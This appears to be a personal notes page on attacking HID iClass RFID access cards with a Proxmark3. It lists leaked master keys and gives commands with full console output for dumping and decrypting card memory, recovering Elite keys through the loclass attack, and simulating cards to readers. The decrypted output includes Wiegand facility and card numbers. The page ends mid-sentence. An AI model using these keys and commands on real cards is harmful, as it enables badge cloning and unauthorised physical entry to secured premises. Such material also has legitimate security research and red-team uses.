HID iClass
HID iClass¶
- High Frequency 13.56 Mhz
- Messages to and from a reader have a MAC
- Uses 14443-4 Type a protocol
- Uses the INCrypt32 algorithm
Heart of Darkness Key: aea684a6dab23278
Source
Pico Pass¶
iClass Legacy¶
- Cryptography and Keys have been leaked
- You can also make a clone of the card by just copying the encrypted data of the card. Even of the ID is from a diffrent card it still works.
Dump Static Keys:
[usb] pm3 --> hf iclass managekeys -p
[=] idx| key
[=] ---+------------------------
[=] 0 | AE A6 84 A6 DA B2 32 78
[=] 1 | FD CB 5A 52 EA 8F 30 90
[=] 2 | F0 E1 D2 C3 B4 A5 96 87
[=] 3 | 76 65 54 43 32 21 10 00
[=] 4 |
[=] 5 |
[=] 6 |
[=] 7 |
[=] ---+------------------------
#Test Known Keys
hf iclass chk -f iclass_default_keys.dic
#Check unlocked keys
hf iclass dump --ki 0
hf iclass dump --ki 1
hf iclass dump --ki 2
hf iclass dump --ki 3
hf iclass dump --ki 4
Dump with known keys:
#Check unlocked keys
hf iclass dump --ki 0
hf iclass dump --ki 1
hf iclass dump --ki 2
hf iclass dump --ki 3
hf iclass dump --ki 4
Decrypt Encrypted User Data:
[usb] pm3 --> hf iclass dump --ki 4
[+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
.
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FF FF FF FF FD FF FF FF | ........ | | E-purse
[=] 3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 17 | ........ | | User / HID CFG
[=] 7/0x07 | 8B EB ED DD 53 68 59 3B | ....ShY; | | User / Enc Cred
[=] 8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[+] saving dump file - 19 blocks read
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump.json
[?] Try `hf iclass decrypt -f` to decrypt dump file
[?] Try `hf iclass view -f` to view dump file
[usb] pm3 --> hf iclass decrypt -f hf-iclass-F8BC0314FEFF12E0-dump.bin
[+] loaded 152 bytes from binary file `hf-iclass-F8BC0314FEFF12E0-dump.bin`
[+] loaded 16 bytes from binary file `iclass_decryptionkey.bin`
[!] Actual file len 152 vs HID app-limit len 144
[=] Setting limit to 144
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-F8BC0314FEFF12E0-dump-decrypted.json
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | F8 BC 03 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FF FF FF FF FD FF FF FF | ........ | | E-purse
[=] 3/0x03 | 44 DC D1 AF C0 97 7F E2 | D....... | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 14 | ........ | | User / HID CFG
[=] 7/0x07 | 00 00 00 00 05 97 61 50 | ......aP | | User / Cred
[=] 8/0x08 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 9/0x09 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[=] Block 7 decoder
[+] Binary..................... 101100101110110000101010000
[=] Wiegand decode
[+] [H10301 ] HID H10301 26-bit FC: 203 CN: 45224 parity ( ok )
[+] [ind26 ] Indala 26-bit FC: 3259 CN: 168 parity ( ok )
[=] found 2 matching formats
[=] -----------------------------------------------------------------
[usb] pm3 -->
Test for static key 0:
hf iclass dump -k "5B 7C 62 C4 91 C1 1B 39"
Use Default Keys:
hf iclass chk -f iclass_default_keys.dic
Simulate Card to Reader to get Keys:
#Use the Proxmark to become a Simulation of a IClass card
hf iclass sim -t 2
#Then use that data to attack the MAC to get the MAC Key
hf iclass loclass -f ../dumps/iclass_mac_attack.bin
Simulate other cards:
#Specify a CSN
hf iclass sim -t 0 --csn 031FEC8AF7FF12E0
#Use default csn
hf iclass sim -t 1
#Simulate full 2K tag
hf iclass sim -t 3
#Reader Attack
hf iclass sim -t 4
IClass Elite¶
https://swende.se/blog/Elite-Hacking.html
- loClass Attack
Test Known Keys:
[usb] pm3 --> hf iclass chk -f iclass_default_keys.dic --elite
[+] loaded 28 keys from dictionary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\dictionaries/iclass_default_keys.dic
[+] Reading tag CSN / CCNR...
[+] CSN: 97 F5 15 14 FE FF 12 E0
[+] CCNR: FC FF FF FF FF FF FF FF 00 00 00 00
[=] Generating diversified keys using elite algo
[+] Searching for DEBIT key...
[+] Found valid key 20 20 66 66 66 66 88 88
[+] time in iclass chk 0.8 seconds
[+] Added key to keyslot 4
[?] Try `hf iclass managekeys -p` to view keys
List known Keys:
[usb] pm3 --> hf iclass managekeys -p
[=] idx| key
[=] ---+------------------------
[=] 0 | AE A6 84 A6 DA B2 32 78
[=] 1 | FD CB 5A 52 EA 8F 30 90
[=] 2 | F0 E1 D2 C3 B4 A5 96 87
[=] 3 | 76 65 54 43 32 21 10 00
[=] 4 | 20 20 66 66 66 66 88 88
[=] 5 |
[=] 6 |
[=] 7 |
[=] ---+------------------------
Dump Card:
[usb] pm3 --> hf iclass dump --ki 4 --elite
[+] Using AA1 (debit) key[4] 20 20 66 66 66 66 88 88
[=] Card has at least 2 application areas. AA1 limit 18 (0x12) AA2 limit 31 (0x1F)
.
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FC FF FF FF FF FF FF FF | ........ | | E-purse
[=] 3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 17 | ........ | | User / HID CFG
[=] 7/0x07 | 40 9D C6 43 21 42 A4 C6 | @..C!B.. | | User / Enc Cred
[=] 8/0x08 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 9/0x09 | 2A D4 C8 21 1F 99 68 71 | *..!..hq | | User / Enc Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
Decrypt Card:
[usb] pm3 --> hf iclass decrypt -f hf-iclass-97F51514FEFF12E0-dump.bin
[+] loaded 152 bytes from binary file `hf-iclass-97F51514FEFF12E0-dump.bin`
[+] loaded 16 bytes from binary file `iclass_decryptionkey.bin`
[!] Actual file len 152 vs HID app-limit len 144
[=] Setting limit to 144
[+] saved 152 bytes to binary file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.bin
[+] saved to json file D:\V0.2.8-win64\rrg_other-20240116-989ef99e4a65424f77721540eb227cb8e86403dd\client\/hf-iclass-97F51514FEFF12E0-dump-decrypted.json
[=] --------------------------- Tag memory ----------------------------
[=] block# | data | ascii |lck| info
[=] ---------+-------------------------+----------+---+----------------
[=] 0/0x00 | 97 F5 15 14 FE FF 12 E0 | ........ | | CSN
[=] 1/0x01 | 12 FF FF FF 7F 1F FF 3C | .......< | | Config
[=] 2/0x02 | FC FF FF FF FF FF FF FF | ........ | | E-purse
[=] 3/0x03 | 5A 81 46 19 E0 47 82 89 | Z.F..G.. | | Debit
[=] 4/0x04 | FF FF FF FF FF FF FF FF | ........ | | Credit
[=] 5/0x05 | FF FF FF FF FF FF FF FF | ........ | | AIA
[=] 6/0x06 | 03 03 03 03 00 03 E0 14 | ........ | | User / HID CFG
[=] 7/0x07 | 00 00 00 00 05 97 63 04 | ......c. | | User / Cred
[=] 8/0x08 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 9/0x09 | 00 00 00 00 00 00 00 00 | ........ | | User / Cred
[=] 10/0x0A | FF FF FF FF FF FF FF FF | ........ | | User
[=] 11/0x0B | FF FF FF FF FF FF FF FF | ........ | | User
[=] 12/0x0C | FF FF FF FF FF FF FF FF | ........ | | User
[=] 13/0x0D | FF FF FF FF FF FF FF FF | ........ | | User
[=] 14/0x0E | FF FF FF FF FF FF FF FF | ........ | | User
[=] 15/0x0F | FF FF FF FF FF FF FF FF | ........ | | User
[=] 16/0x10 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 17/0x11 | FF FF FF FF FF FF FF FF | ........ | | User
[=] 18/0x12 | FF FF FF FF FF FF FF FF | ........ | | User
[=] ---------+-------------------------+----------+---+----------------
[?] yellow = legacy credential
[=] Block 7 decoder
[+] Binary..................... 101100101110110001100000100
[=] Wiegand decode
[+] [H10301 ] HID H10301 26-bit FC: 203 CN: 45442 parity ( ok )
[+] [ind26 ] Indala 26-bit FC: 3259 CN: 386 parity ( ok )
[=] found 2 matching formats
[=] -----------------------------------------------------------------
ICLASS SR¶
- Card used as a traditional card between ICLASS Legacy and SE
ICLASS SE¶
- Uses the PicoPass Protocol
- Standard Key and KDF have not been leaked
- Can be downgraded to Legacy or SR Cards
- Contains a Smart Card
- Digital Signature Authentication
- Encrypted
SIO: Encrypted Wiegand(ASN1) and Authentication MAC. Cloning data to another card wont work
- Write keys are biased off the UID/CSN
Note
Reader has a bug to allow for MAC bypass
Dumping SIO Replay NRMAC¶
If you make a card with the same encrypted data